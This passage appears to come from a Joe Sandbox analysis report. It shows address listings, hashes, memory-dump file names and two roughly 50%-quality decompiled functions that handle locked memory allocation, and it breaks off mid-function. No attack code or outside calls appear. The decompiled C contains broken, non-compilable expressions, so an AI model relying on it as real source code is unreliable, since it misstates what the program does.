0x000b37bb
0x000b37ad
0x000b3775
0x000b376b
0x000b3567
0x000b3567
0x000b3576
0x000b386e
0x000b386f
0x000b386f
0x000b357e
0x000b3585
0x000b3862
0x000b3862
0x00000000
0x000b358b
0x000b358b
0x000b358f
0x000b3864
0x000b386d
0x000b3595
0x000b3597
0x000b359c
0x000b359e
0x000b35a7
0x000b35b0
0x000b35c6
0x000b35d0
0x000b35d6
0x000b387e
0x000b387e
0x000b35dc
0x000b35df
0x000b35df
0x000b35e9
0x000b35ed
0x000b35f1
0x000b35f5
0x000b35fa
0x000b35fd
0x000b3600
0x000b3609
0x000b360e
0x000b3611
0x000b3613
0x000b3619
0x000b388f
0x000b3cc8
0x000b3ccc
0x000b3cd1
0x000b3cd3
0x000b3cd3
0x000b3897
0x000b38a3
0x00000000
0x000b38a9
0x000b38a9
0x000b38ab
0x000b38ad
0x000b38b4
0x000b3cdc
0x000b38ba
0x000b38ba
0x000b38ba
0x000b38bd
0x000b38c7
0x000b38d5
0x000b38da
0x000b38da
0x000b390c
0x000b3916
0x000b3920
0x000b3928
0x000b392e
0x000b393b
0x000b3952
0x000b3957
0x000b3957
0x000b393b
0x00000000
0x000b3928
0x000b361f
0x000b361f
0x000b3623
0x000b3671
0x000b3671
0x000b3674
0x000b367a
0x000b3967
0x000b3967
0x000b396d
0x000b3971
0x000b3979
0x000b397d
0x000b397d
0x000b3982
0x000b398b
0x000b3991
0x000b3995
0x000b3d0c
0x000b3d0d
0x00000000
0x000b399b
0x000b399b
0x000b399d
0x000b399f
0x000b39a1
0x000b39ac
0x000b39b4
0x000b3d0f
0x000b3d0f
0x000b3d10
0x000b3d12
0x000b3d12
0x000b3d13
0x000b3d15
0x000b3d15
0x000b3d16
0x000b3d18
0x000b3d19
0x000b3d1a
0x000b3d1b
0x000b3d1c
0x000b3d1d
0x000b3d1e
0x000b3d1f
0x000b3d23
0x000b3d24
0x000b3d27
0x000b3d2f
0x000b3d58
0x000b3d58
0x000b3d31
0x000b3d3e
0x000b3d40
0x000b3d5c
0x000b3d5d
0x000b3d5d
0x000b3d4b
0x000b3d52
0x000b39ba
0x000b39ba
0x000b39c2
0x000b39d2
0x000b39d7
0x000b3cb2
0x000b3cb2
0x000b39e6
0x00000000
0x000b39e6
0x000b39b4
0x000b3680
0x000b3683
0x000b3686
0x000b368b
0x00000000
0x000b369f
0x000b369f
0x000b36af
0x000b36b8
0x00000000
0x000b36be
0x000b36c0
0x000b36c3
0x000b36c7
0x000b36d4
0x000b395f
0x000b3963
0x00000000
0x000b36da
0x000b36de
0x000b36e0
0x000b36e2
0x000b36e6
0x000b36ef
0x000b36f1
0x000b36f5
0x000b36f9
0x000b3702
0x000b39fe
0x000b39ff
0x000b3a00
0x000b3a00
0x000b370e
0x000b3a0c
0x000b3a0c
0x00000000
0x000b370e
0x000b36d4
0x000b36b8
0x000b368b
0x000b3625
0x000b362b
0x000b3bc3
0x000b3631
0x000b3631
0x000b3631
0x000b363e
0x000b3c4e
0x000b3c55
0x000b3cfc
0x000b3c5b
0x000b3c5e
0x000b3c5e
0x000b3c70
0x000b3c75
0x000b3c7b
0x000b3c7b
0x000b364a
0x000b3650
0x000b3655
0x000b3655
0x000b365d
0x000b3876
0x000b3876
0x000b3878
0x000b3879
0x00000000
0x000b3663
0x000b3663
0x000b366b
0x000b3bd4
0x000b3bdb
0x000b3be8
0x000b3bef
0x000b3714
0x000b3714
0x00000000
0x00000000
0x00000000
0x00000000
0x000b366b
0x000b365d
0x000b3623
0x000b3619
0x000b358f
0x000b3585

APIs

TryAcquireSRWLockExclusive.KERNEL32(?), ref: 000B3971
ReleaseSRWLockExclusive.KERNEL32(?), ref: 000B39E6
TryAcquireSRWLockExclusive.KERNEL32(?), ref: 000B3B0B
ReleaseSRWLockExclusive.KERNEL32(?), ref: 000B3B7E

Strings

, xrefs: 000B3CF3

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID:
API String ID: 17069307-3916222277
Opcode ID: 5cf79b6f756abe92d3756174b0e7f653605227df04bddf99d9d39430239daf6f
Instruction ID: d8b97e62259d4522751c18e9feb0df728eb2dbcf12815928b559bc8127b038cf
Opcode Fuzzy Hash: 5cf79b6f756abe92d3756174b0e7f653605227df04bddf99d9d39430239daf6f
Instruction Fuzzy Hash: 16223671A002418FDB28CF68C885BF9B7E1FF45314F28856CE9598B286DB75EE45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 000B2380 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 454
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E000B2380(void* __fp0, signed int _a8, intOrPtr _a12) {
				void* _v16;
				signed int _v24;
				signed int _v28;
				char _v48;
				char _v49;
				char _v52;
				char _v53;
				signed int _v56;
				char _v57;
				signed int _v60;
				signed int _v61;
				intOrPtr _v64;
				signed int _v68;
				signed char _v69;
				signed short _v72;
				signed short _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				signed int _t177;
				signed char _t178;
				signed short* _t179;
				intOrPtr _t187;
				signed short* _t192;
				void* _t194;
				signed int _t197;
				signed int _t203;
				void* _t206;
				signed int _t210;
				signed int _t212;
				signed int _t219;
				signed int _t220;
				signed int _t226;
				signed int _t228;
				signed int _t232;
				signed int _t236;
				signed short _t241;
				signed int _t246;
				intOrPtr _t249;
				intOrPtr _t250;
				unsigned int _t254;
				intOrPtr _t259;
				signed int _t260;
				signed int _t263;
				signed int _t268;
				signed int _t282;
				signed char _t283;
				signed int _t284;
				signed int _t290;
				signed char _t291;
				void* _t299;
				intOrPtr _t300;
				intOrPtr _t302;
				signed short _t306;
				signed int _t313;
				void* _t317;
				signed short _t318;
				signed int _t319;
				void* _t320;
				signed short** _t322;
				char* _t326;
				intOrPtr* _t329;
				signed int _t331;
				signed short _t336;
				signed short _t337;
				signed int _t344;
				signed int _t345;
				void* _t347;
				void* _t365;
				void* _t370;
				void* _t382;

				_t382 = __fp0;
				_t347 = (_t345 & 0xfffffff0) - 0x40;
				_t171 = _a8;
				_t228 =  *0x120014; // 0xf049169a
				_v24 = _t228 ^ _t344;
				_t232 = (( *0x133ec0 & 0x000000ff) << 3) + _a12;
				if(_t232 < 0) {
					asm("int3");
					_t293 = _t171 * 0 >> 0x20;
					_t172 = _t171 * 0;
					__eflags = _t172;
					if(_t172 >= 0) {
						L2:
						_t335 = _t172;
						L3:
						_t173 =  *0x1315c0; // 0x131600
						if(_t173 == 0) {
							_t173 = E000B4240(_t219, _t293, _t317);
							__eflags = _t335;
							if(_t335 != 0) {
								L5:
								_t318 = _t335;
								L6:
								_t319 = _t318 +  *((intOrPtr*)(_t173 + 0xc));
								if(_t319 < _t335) {
									L85:
									asm("int3");
									asm("ud2");
									L86:
									__imp__ReleaseSRWLockExclusive(_v72);
									_t320 = 0;
									L42:
									E000DE643(_t173, _t219, _v28 ^ _t344, _t293, _t320, _t335);
									return _t320;
								}
								_t236 =  *(_t173 + 2) & 0x000000ff;
								_v76 = _t173;
								_v60 = _t319;
								if(_t236 == 2) {
									_t237 = 0x20;
									__eflags = _t319;
									if(_t319 != 0) {
										asm("bsr ecx, edi");
										_t237 = 0x3f;
										__eflags = 0x20;
									}
									_t177 = 0x20 - _t237;
									_t293 = _t319 >> ( *(0x115a40 - _t237) & 0x000000ff) & 0x00000007;
									_t178 = (_t319 >> ( *(0x115a40 - _t237) & 0x000000ff) & 0x00000007) + _t177 * 8;
									__eflags = ( *(0x115a44 + _t177 * 4) & _t319) - 1;
									asm("sbb eax, 0xffffffff");
									_t18 = _t178 + 0x11580c; // 0x0
									_t335 =  *(_t178 + _t18) & 0x0000ffff;
								} else {
									if(_t236 != 1) {
										_t309 = 0x20;
										__eflags = _t319;
										if(_t319 != 0) {
											asm("bsr edx, edi");
											_t309 = 0x3f;
											__eflags = 0x20;
										}
										_t210 = 0x20 - _t309;
										_t282 =  *(0x115a44 + _t210 * 4) & _t319;
										_t211 = (_t319 >> ( *(0x115a40 - _t309) & 0x000000ff) & 0x00000007) + _t210 * 8;
										__eflags = _t282 - 1;
										asm("sbb eax, 0xffffffff");
										_t24 = _t211 + 0x11580c; // 0x0
										_t178 =  *((_t319 >> ( *(0x115a40 - _t309) & 0x000000ff) & 0x00000007) + _t210 * 8 + _t24) & 0x0000ffff;
										__eflags = _t319 - 0x41;
										_t283 = _t282 & 0xffffff00 | _t319 - 0x00000041 >= 0x00000000;
										__eflags = _t178 - 0x76;
										_t293 = (_t309 & 0xffffff00 | __eflags > 0x00000000) & _t283;
										_t335 = (_t309 & 0xffffff00 | __eflags > 0x00000000) & _t283 & 0x000000ff | _t178;
									} else {
										_t284 = _t319 - 0x101;
										_t212 = _t319;
										if(_t284 <= 0xfefe) {
											if(_t319 == 1) {
												_t291 = 0x20;
											} else {
												asm("bsr ecx, eax");
												_t291 = _t284 ^ 0x0000001f;
											}
											_t212 =  <  ? 1 <<  ~_t291 : 0xbadbb1 >> 2;
										}
										_t342 = 0x20;
										if(_t212 != 0) {
											asm("bsr esi, eax");
											_t342 = 0x3f;
										}
										_t313 = (_t212 >> ( *(0x115a40 - _t342) & 0x000000ff) & 0x00000007) + (0x20 - _t342) * 8;
										asm("sbb edx, 0xffffffff");
										_t36 = _t313 + 0x11580c; // 0x0
										_t290 =  *(_t313 + _t36) & 0x0000ffff;
										_t178 = _t212 & 0xffffff00 | _t212 - 0x00000041 >= 0x00000000;
										_t365 = _t290 - 0x76;
										_t293 = (_t313 & 0xffffff00 | _t365 > 0x00000000) & _t178;
										_t335 = (_t313 & 0xffffff00 | _t365 > 0x00000000) & _t178 & 0x000000ff | _t290;
									}
								}
								_v49 = 0;
								_v56 = 0xffffffff;
								_t241 = _v76;
								_t220 =  *_t241 & 0x000000ff;
								if(_t220 == 2) {
									_t178 =  *0x123d89 & 0x000000ff;
									__eflags = _t178 & 0x00000001;
									if((_t178 & 0x00000001) != 0) {
										_t178 = L000B7BD0(_t220, _t382);
										_t241 = _v76;
									}
								}
								_v61 = _t220;
								if( *((char*)(_t241 + 3)) == 0) {
									_t219 = (_t335 & 0x0000ffff) << 5;
									_t322 = _t241 + _t219 + 0x48;
									_t336 = _t241 + 0x40;
									__imp__TryAcquireSRWLockExclusive(_t336);
									__eflags = _t178;
									if(_t178 == 0) {
										L000A8B90(_t178, _t336);
									}
									_v76 = _t336;
									_t179 =  *_t322;
									_t335 =  *_t179;
									__eflags = _t335;
									if(_t335 == 0) {
										goto L78;
									} else {
										_t302 = _v80;
										_v53 = 0;
										_t259 =  *((intOrPtr*)(_t302 + 0x48 + _t219 + 0xc));
										_t219 = _t259 -  *((intOrPtr*)(_t302 + 0xc));
										_t293 =  *_t335;
										__eflags = _t293;
										_v72 = _t335;
										if(_t293 == 0) {
											_t260 = 0;
											__eflags = 0;
											L71:
											_t335 = _v76;
											 *_t179 = _t260;
											goto L74;
										}
										_v64 = _t259;
										_t260 = _t293;
										asm("bswap ecx");
										__eflags = (_t260 ^ _t335) - 0x1fffff;
										if((_t260 ^ _t335) > 0x1fffff) {
											L82:
											asm("pcmpeqd xmm0, xmm0");
											asm("movdqa [esp+0x20], xmm0");
											_t326 =  &_v52;
											_t194 = L000A88D0(_t326, "first", _t293, 0);
											_push(_t326);
											goto L84;
										}
										__eflags = _t260 & 0x001fc000;
										if((_t260 & 0x001fc000) == 0) {
											goto L82;
										}
										asm("prefetcht0 [ecx]");
										goto L71;
									}
								} else {
									_t197 =  *0x123e38; // 0x0
									_t329 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t197 * 4)) + 0xa0));
									_t293 = _t335 & 0x0000ffff;
									_v72 = _t293;
									if(_t329 < 2) {
										_push( &_v56);
										_push(_t293);
										_t173 = E000B9960(_t241);
										_t250 = _v84;
										__eflags = _t173;
										if(_t173 != 0) {
											L34:
											_t219 = _v52 -  *((intOrPtr*)(_t250 + 0xc));
											L35:
											_t320 =  *((intOrPtr*)(_t250 + 0x10)) + _t173;
											if(_v57 == 0) {
												_t335 = _t173;
												E000E11A0(_t320, _t320, 0, _t219);
												_t250 = _v84;
											}
											_t293 = _v69 & 0x000000ff;
											if( *((char*)(_t250 + 6)) != 0) {
												if((_t173 & 0x00000fff) == 0) {
													_t254 = _t173;
													_t335 = _t254;
													_t192 = (_t173 & 0xffe00000) + (_t254 >> 0x00000009 & 0x00000ff8) + 0x2000;
												} else {
													_t335 = _t173;
													_t192 = _t173 + 0xfffffffc;
												}
												 *_t192 = 1;
												_t173 = _t335;
											}
											if(_t293 == 2) {
												_t219 = _t173;
												_t173 = _t173 >> 0x15;
												__eflags =  *((short*)(_t173 + _t173 + 0x122d24)) - 0xfffe;
												if( *((short*)(_t173 + _t173 + 0x122d24)) == 0xfffe) {
													_t173 = _t219 & 0xffe00000;
													_t293 = 3 << (_t219 >> 0x00000002 & 0x0000001e);
													_t219 = _t219 >> 0x00000005 & 0x0000fffc;
													asm("lock or [ebx+eax+0x4000], edx");
												}
											}
											goto L42;
										}
										L59:
										_t226 = _v68;
										L61:
										_t219 = _t226 << 5;
										_t322 = _t250 + _t219 + 0x48;
										_t337 = _t250 + 0x40;
										__imp__TryAcquireSRWLockExclusive(_t337);
										__eflags = _t173;
										if(_t173 == 0) {
											L000A8B90(_t173, _t337);
										}
										_v72 = _t337;
										_t179 =  *_t322;
										_t335 =  *_t179;
										__eflags = _t335;
										if(_t335 == 0) {
											L78:
											_t173 = L000B87D0(_t322, _v80, 2, _v64, 0x4000,  &_v53); // executed
											_v92 = _t173;
											__eflags = _t173;
											if(_t173 == 0) {
												goto L86;
											}
											_t299 = (_v72 >> 0x00000009 & 0x00000fe0) + (_v72 & 0xffe00000) - (( *((_v72 >> 0x00000009 & 0x00000fe0) + (_v72 & 0xffe00000) + 0x101e) & 0x3f) << 5);
											_t179 = _t299 + 0x1000;
											__eflags =  *(_t299 + 0x100f) & 0x00000008;
											if(( *(_t299 + 0x100f) & 0x00000008) != 0) {
												_t246 =  &(_t179[0x10]);
											} else {
												_t246 = _t179[4] + 0xc;
												__eflags = _t246;
											}
											_t219 =  *_t246 -  *((intOrPtr*)(_v80 + 0xc));
											_t335 = _v76;
											goto L75;
										} else {
											_t306 = _v76;
											_v49 = 0;
											_t268 =  *(_t306 + 0x48 + _t219 + 0xc);
											_t219 = _t268 -  *((intOrPtr*)(_t306 + 0xc));
											_t331 =  *_t335;
											__eflags = _t331;
											_v68 = _t335;
											if(_t331 == 0) {
												__eflags = 0;
												L73:
												_t335 = _v72;
												 *_t179 = 0;
												L74:
												_t263 = _t179[6] & 0xffffc001 | _t179[6] + 0x00000002 & 0x00003ffe;
												__eflags = _t263;
												_t179[6] = _t263;
												L75:
												_t300 = _v80;
												_t187 =  *((intOrPtr*)(_t300 + 0x117c)) +  *(_t179[4] + 0xc);
												 *((intOrPtr*)(_t300 + 0x117c)) = _t187;
												_t249 =  *((intOrPtr*)(_t300 + 0x1180));
												__eflags = _t249 - _t187;
												_t188 =  >  ? _t249 : _t187;
												 *((intOrPtr*)(_t300 + 0x1180)) =  >  ? _t249 : _t187;
												__imp__ReleaseSRWLockExclusive(_t335);
												_t250 = _v84;
												_t173 = _v76;
												goto L35;
											}
											_v60 = _t268;
											_t293 = _t331;
											asm("bswap edx");
											__eflags = (_t293 ^ _t335) - 0x1fffff;
											if((_t293 ^ _t335) > 0x1fffff) {
												L83:
												asm("pcmpeqd xmm0, xmm0");
												asm("movdqa [esp+0x20], xmm0");
												_t219 =  &_v48;
												_t194 = L000A88D0(_t219, "first", _t331, 0);
												_push(_t219);
												L84:
												E00070790(_t194);
												_t173 = L000A8960(_v64, _t382);
												goto L85;
											}
											__eflags = _t293 & 0x001fc000;
											if((_t293 & 0x001fc000) == 0) {
												goto L83;
											}
											asm("prefetcht0 [edx]");
											goto L73;
										}
									}
									 *((intOrPtr*)(_t329 + 8)) =  *((intOrPtr*)(_t329 + 8)) + 1;
									asm("adc dword [edi+0xc], 0x0");
									_t226 = _t335 & 0x0000ffff;
									_t370 =  *0x122d20 - _t226; // 0x1f
									if(_t370 < 0) {
										 *((intOrPtr*)(_t329 + 0x28)) =  *((intOrPtr*)(_t329 + 0x28)) + 1;
										asm("adc dword [edi+0x2c], 0x0");
										 *((intOrPtr*)(_t329 + 0x18)) =  *((intOrPtr*)(_t329 + 0x18)) + 1;
										asm("adc dword [edi+0x1c], 0x0");
										goto L61;
									}
									if( *(_t329 + 0x58 + _t226 * 8) == 0) {
										 *((intOrPtr*)(_t329 + 0x20)) =  *((intOrPtr*)(_t329 + 0x20)) + 1;
										asm("adc dword [edi+0x24], 0x0");
										 *((intOrPtr*)(_t329 + 0x18)) =  *((intOrPtr*)(_t329 + 0x18)) + 1;
										asm("adc dword [edi+0x1c], 0x0");
										E000A85A0(_t329, _t226);
										_t250 = _v80;
										_t173 =  *(_t329 + 0x58 + _t226 * 8);
										__eflags = _t173;
										if(_t173 != 0) {
											L29:
											_v68 =  *(_t329 + 0x5e + _t226 * 8) & 0x0000ffff;
											_t335 = _t173;
											_t203 =  *_t173;
											if(_t203 == 0) {
												_t293 = 0;
												__eflags = 0;
												L33:
												 *((char*)(_t329 + 0x5c + _t226 * 8)) =  *((char*)(_t329 + 0x5c + _t226 * 8)) - 1;
												 *(_t329 + 0x58 + _t226 * 8) = _t293;
												_v56 = _v68;
												 *_t329 =  *_t329 - ( *(_t329 + 0x5e + _t226 * 8) & 0x0000ffff);
												_t173 = _t335;
												if(_t173 == 0) {
													goto L59;
												}
												goto L34;
											}
											_t293 = _t203;
											asm("bswap edx");
											if((_t293 & 0x001fc000) == 0) {
												asm("pcmpeqd xmm0, xmm0");
												asm("movdqa [esp+0x20], xmm0");
												_t322 =  &_v48;
												_t206 = L000A88D0(_t322, "first", _t203, 0);
												_push(_t322);
												E00070790(_t206);
												_t347 = _t347 + 4;
												L000A8960(_v80, _t382);
												goto L78;
											}
											asm("prefetcht0 [edx]");
											goto L33;
										}
										goto L61;
									}
									 *((intOrPtr*)(_t329 + 0x10)) =  *((intOrPtr*)(_t329 + 0x10)) + 1;
									asm("adc dword [edi+0x14], 0x0");
									goto L29;
								}
							}
							L53:
							_t318 = 1;
							goto L6;
						}
						if(_t335 == 0) {
							goto L53;
						}
						goto L5;
					}
					L51:
					asm("int3");
					_t335 = 0;
					goto L3;
				}
				_t293 = _t171 * _t232 >> 0x20;
				_t172 = _t171 * _t232;
				if(_t172 < 0) {
					goto L51;
				}
				goto L2;
			}

0x000b2380
0x000b2389
0x000b238c
0x000b238f
0x000b2397
0x000b23a5
0x000b23a8
0x000b26d6
0x000b26d9
0x000b26d9
0x000b26d9
0x000b26db
0x000b23b6
0x000b23b6
0x000b23b8
0x000b23b8
0x000b23bf
0x000b26e9
0x000b26ee
0x000b26f0
0x000b23cd
0x000b23cd
0x000b23cf
0x000b23cf
0x000b23d4
0x000b29a4
0x000b29a4
0x000b29a5
0x000b29a7
0x000b29ab
0x000b29b1
0x000b263f
0x000b2645
0x000b2653
0x000b2653
0x000b23da
0x000b23e1
0x000b23e5
0x000b23e9
0x000b241d
0x000b2422
0x000b2424
0x000b2426
0x000b2429
0x000b2429
0x000b2429
0x000b242c
0x000b243c
0x000b2448
0x000b244b
0x000b244e
0x000b2451
0x000b2451
0x000b23eb
0x000b23ee
0x000b2463
0x000b2468
0x000b246a
0x000b246c
0x000b246f
0x000b246f
0x000b246f
0x000b2480
0x000b248c
0x000b248e
0x000b2491
0x000b2494
0x000b2497
0x000b2497
0x000b249f
0x000b24a2
0x000b24a5
0x000b24ac
0x000b24b1
0x000b23f0
0x000b23f0
0x000b23f6
0x000b23fe
0x000b2407
0x000b24b5
0x000b240d
0x000b240d
0x000b2410
0x000b2410
0x000b24cf
0x000b24cf
0x000b24d7
0x000b24de
0x000b24e0
0x000b24e3
0x000b24e3
0x000b2502
0x000b2508
0x000b250b
0x000b250b
0x000b2516
0x000b2519
0x000b2520
0x000b2525
0x000b2525
0x000b23ee
0x000b2527
0x000b252c
0x000b2534
0x000b2538
0x000b253e
0x000b2700
0x000b2707
0x000b2709
0x000b270f
0x000b2714
0x000b2714
0x000b2709
0x000b2548
0x000b254c
0x000b2657
0x000b265d
0x000b2660
0x000b2664
0x000b266a
0x000b266c
0x000b2670
0x000b2670
0x000b2675
0x000b2679
0x000b267b
0x000b267d
0x000b267f
0x00000000
0x000b2685
0x000b2685
0x000b268c
0x000b2691
0x000b2697
0x000b269a
0x000b269c
0x000b269e
0x000b26a2
0x000b282f
0x000b282f
0x000b2831
0x000b2831
0x000b2835
0x00000000
0x000b2835
0x000b26a8
0x000b26ac
0x000b26ae
0x000b26b4
0x000b26ba
0x000b2955
0x000b2955
0x000b2959
0x000b295f
0x000b296d
0x000b2972
0x00000000
0x000b2972
0x000b26c2
0x000b26c8
0x00000000
0x00000000
0x000b26ce
0x00000000
0x000b26ce
0x000b2552
0x000b2552
0x000b2561
0x000b2567
0x000b256d
0x000b2571
0x000b2761
0x000b2762
0x000b2763
0x000b2768
0x000b276c
0x000b276e
0x000b25ec
0x000b25f0
0x000b25f3
0x000b25f6
0x000b25fd
0x000b2603
0x000b2605
0x000b260c
0x000b2610
0x000b2617
0x000b261c
0x000b2623
0x000b2893
0x000b289a
0x000b28a7
0x000b2629
0x000b2629
0x000b262b
0x000b262b
0x000b262e
0x000b2634
0x000b2634
0x000b2639
0x000b271d
0x000b271f
0x000b2722
0x000b272b
0x000b2733
0x000b2745
0x000b274a
0x000b2750
0x000b2750
0x000b272b
0x00000000
0x000b2639
0x000b2774
0x000b2774
0x000b278a
0x000b278a
0x000b2790
0x000b2793
0x000b2797
0x000b279d
0x000b279f
0x000b27a3
0x000b27a3
0x000b27a8
0x000b27ac
0x000b27ae
0x000b27b0
0x000b27b2
0x000b28e0
0x000b28f6
0x000b28fb
0x000b28ff
0x000b2901
0x00000000
0x00000000
0x000b292c
0x000b292e
0x000b2934
0x000b293b
0x000b29b8
0x000b293d
0x000b2940
0x000b2940
0x000b2940
0x000b2949
0x000b294c
0x00000000
0x000b27b8
0x000b27b8
0x000b27bf
0x000b27c4
0x000b27ca
0x000b27cd
0x000b27cf
0x000b27d1
0x000b27d5
0x000b2839
0x000b283b
0x000b283b
0x000b283f
0x000b2841
0x000b2853
0x000b2853
0x000b2855
0x000b2858
0x000b285b
0x000b2865
0x000b2868
0x000b286e
0x000b2874
0x000b2876
0x000b2879
0x000b2880
0x000b2886
0x000b288a
0x00000000
0x000b288a
0x000b27d7
0x000b27db
0x000b27dd
0x000b27e3
0x000b27e9
0x000b2975
0x000b2975
0x000b2979
0x000b297f
0x000b298d
0x000b2992
0x000b2993
0x000b2993
0x000b299f
0x00000000
0x000b299f
0x000b27f1
0x000b27f7
0x00000000
0x00000000
0x000b27fd
0x00000000
0x000b27fd
0x000b27b2
0x000b2577
0x000b257b
0x000b257f
0x000b2582
0x000b2589
0x000b277a
0x000b277e
0x000b2782
0x000b2786
0x00000000
0x000b2786
0x000b2595
0x000b2802
0x000b2806
0x000b280a
0x000b280e
0x000b2815
0x000b281a
0x000b281e
0x000b2822
0x000b2824
0x000b25a3
0x000b25a8
0x000b25ac
0x000b25ae
0x000b25b2
0x000b25c9
0x000b25c9
0x000b25cb
0x000b25cb
0x000b25cf
0x000b25d7
0x000b25e0
0x000b25e2
0x000b25e6
0x00000000
0x00000000
0x00000000
0x000b25e6
0x000b25b4
0x000b25b6
0x000b25be
0x000b28b1
0x000b28b5
0x000b28bb
0x000b28c9
0x000b28ce
0x000b28cf
0x000b28d4
0x000b28db
0x00000000
0x000b28db
0x000b25c4
0x00000000
0x000b25c4
0x00000000
0x000b282a
0x000b259b
0x000b259f
0x00000000
0x000b259f
0x000b254c
0x000b26f6
0x000b26f6
0x00000000
0x000b26f6
0x000b23c7
0x00000000
0x00000000
0x00000000
0x000b23c7
0x000b26e1
0x000b26e1
0x000b26e2
0x00000000
0x000b26e2
0x000b23ae
0x000b23ae
0x000b23b0
0x00000000
0x00000000
0x00000000

APIs

TryAcquireSRWLockExclusive.KERNEL32(?), ref: 000B2664
TryAcquireSRWLockExclusive.KERNEL32(?,0000002C,FFFFFFFF), ref: 000B2797

Part of subcall function 000A85A0: TryAcquireSRWLockExclusive.KERNEL32(?), ref: 000A85EC
Part of subcall function 000A85A0: ReleaseSRWLockExclusive.KERNEL32(?,?,00000021,?,00004000,000000FF), ref: 000A8741

ReleaseSRWLockExclusive.KERNEL32(?), ref: 000B2880
ReleaseSRWLockExclusive.KERNEL32(?), ref: 000B29AB

Strings

first, xrefs: 000B28C4, 000B2968, 000B2988

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: first
API String ID: 17069307-2456940119
Opcode ID: 2b2ff11d968d45d2c26a67ecb6ed58bafaf4e8b84928f2c2c01da88761adc5e1
Instruction ID: 34e6d7aa73dfcb7837176efdbc25137d13fc31e0bba3b5190bb39e78238d634e
Opcode Fuzzy Hash: 2b2ff11d968d45d2c26a67ecb6ed58bafaf4e8b84928f2c2c01da88761adc5e1
Instruction Fuzzy Hash: 6E022772A047418BD319CF28C8947BAB7E2FFC5314F19866CE8459B692DB34DD45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 000B1960 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 370
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E000B1960(void* __edx, void* __fp0, intOrPtr _a8) {
				void* _v16;
				signed int _v24;
				signed int _v32;
				char _v48;
				char _v49;
				char _v52;
				char _v53;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed char _v69;
				signed int _v72;
				intOrPtr _v76;
				signed int _v77;
				signed int _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t130;
				signed int _t136;
				signed int _t138;
				signed char _t140;
				signed char* _t141;
				signed int* _t142;
				signed int _t144;
				intOrPtr _t150;
				void* _t153;
				signed int _t156;
				signed int _t159;
				signed int _t161;
				void* _t163;
				signed int _t168;
				signed int _t170;
				signed int _t171;
				signed char* _t179;
				signed int _t184;
				signed int _t189;
				intOrPtr _t199;
				unsigned int _t201;
				intOrPtr* _t209;
				signed int _t210;
				signed int _t213;
				signed int _t223;
				signed int _t230;
				signed int _t232;
				signed int _t238;
				signed char _t239;
				void* _t241;
				signed int _t247;
				signed int _t261;
				signed int _t262;
				intOrPtr _t267;
				void* _t268;
				signed int _t270;
				signed char* _t271;
				void* _t272;
				intOrPtr* _t274;
				signed int _t287;
				void* _t295;
				void* _t297;

				_t297 = __fp0;
				_t241 = __edx;
				_t267 = _a8;
				_t130 =  *0x120014; // 0xf049169a
				_v24 = _t130 ^ _t287;
				_t179 =  *0x1315c0; // 0x131600
				if(_t179 == 0) {
					L5:
					_t179 = E000B4240(_t179, _t241, _t267);
				}
				_t268 = _t267 + (( *0x133ec0 & 1) << 3);
				_t295 = _t268;
				if(_t295 < 0) {
					asm("int3");
					L7:
					_t270 = _t179[0xc] + 1;
					__eflags = _t270;
					L8:
					_t136 = _t179[2] & 0x000000ff;
					__eflags = _t136 - 2;
					_v60 = _t270;
					if(_t136 == 2) {
						_t185 = 0x20;
						__eflags = _t270;
						if(_t270 != 0) {
							asm("bsr ecx, edi");
							_t185 = 0x3f;
							__eflags = 0x20;
						}
						_t138 = 0x20 - _t185;
						_t139 = (_t270 >> ( *(0x115a40 - _t185) & 0x000000ff) & 0x00000007) + _t138 * 8;
						__eflags = ( *(0x115a44 + _t138 * 4) & _t270) - 1;
						asm("sbb eax, 0xffffffff");
						_t13 = _t139 + 0x11580c; // 0x0
